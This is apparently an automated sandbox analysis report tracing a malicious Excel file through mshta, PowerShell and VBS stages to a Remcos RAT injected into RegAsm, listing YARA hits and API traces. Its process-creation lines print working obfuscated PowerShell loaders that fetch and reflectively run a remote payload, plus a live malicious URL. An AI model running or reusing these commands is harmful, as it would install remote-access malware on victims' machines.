                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CA73 SystemParametersInfoW,31_2_0041CA73

                  System Summary

                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants, Author: unknown
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
                  Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3904, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR, Matched rule: Detects Invoke-Mimikatz String, Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3392, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR, Matched rule: Detects Invoke-Mimikatz String, Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
                  Source: 037002451082_10142024.xls, OLE: Microsoft Excel 2007+
                  Source: 7D330000.0.dr, OLE: Microsoft Excel 2007+
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\networkthinkinggreatthingstobeenough[1].hta
                  Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                  Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 blob removed]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 24_2_00401806 NtdllDefWindowProc_W,24_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 24_2_004018C0 NtdllDefWindowProc_W,24_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 25_2_004016FD NtdllDefWindowProc_A,25_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 25_2_004017B7 NtdllDefWindowProc_A,25_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 26_2_00402CAC NtdllDefWindowProc_A,26_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 26_2_00402D66 NtdllDefWindowProc_A,26_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 31_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,31_2_004167EF
                  Source: 037002451082_10142024.xls, OLE indicator, VBA macros: true
                  Source: 037002451082_10142024.xlsStream path 'MBD002DCAA1/\x1Ole' : https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squide$nF5E(1Bi-1`U&d)K[BdAOlZk-Lxe]Lr|OAk7V{Q6KyiY.y<>$=UDK?!cRhnJ*.F`*)n}7)TrJGm$M-IO.:jlVytACKfTYbBZrQL0Bp44qA2qrUlecrlwiyeZVYVHVnljhQPIILCb03DeOQHHsZ7oqmwAbOtGcT4CWsCGhYSUTlEF637A6WirUpV40uQYHdBoxMC3SHJrA7H4N8RhzmC0L9OIQWCsbwBY348Oi5Agg5KAMC);c1?"nGc.%b
                  Source: 7D330000.0.drStream path 'MBD002DCAA1/\x1Ole' : https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squide$nF5E(1Bi-1`U&d)K[BdAOlZk-Lxe]Lr|OAk7V{Q6KyiY.y<>$=UDK?!cRhnJ*.F`*)n}7)TrJGm$M-IO.:jlVytACKfTYbBZrQL0Bp44qA2qrUlecrlwiyeZVYVHVnljhQPIILCb03DeOQHHsZ7oqmwAbOtGcT4CWsCGhYSUTlEF637A6WirUpV40uQYHdBoxMC3SHJrA7H4N8RhzmC0L9OIQWCsbwBY348Oi5Agg5KAMC);c1?"nGc.%b
                  Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3904, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR, Matched rule: Invoke_Mimikatz, date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3392, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR, Matched rule: Invoke_Mimikatz, date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: bhv8F64.tmp.24.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/49@8/5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,24_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,26_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,31_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,24_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,24_2_00413D4C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,24_2_0040B58D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,31_2_0041AADB
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\7D330000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA2A4.tmp
                  Source: 037002451082_10142024.xlsOLE indicator, Workbook stream: true
                  Source: 7D330000.0.drOLE indicator, Workbook stream: true
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: RegAsm.exe, RegAsm.exe, 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: 037002451082_10142024.xlsVirustotal: Detection: 7%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_25-33280
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = 
[system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
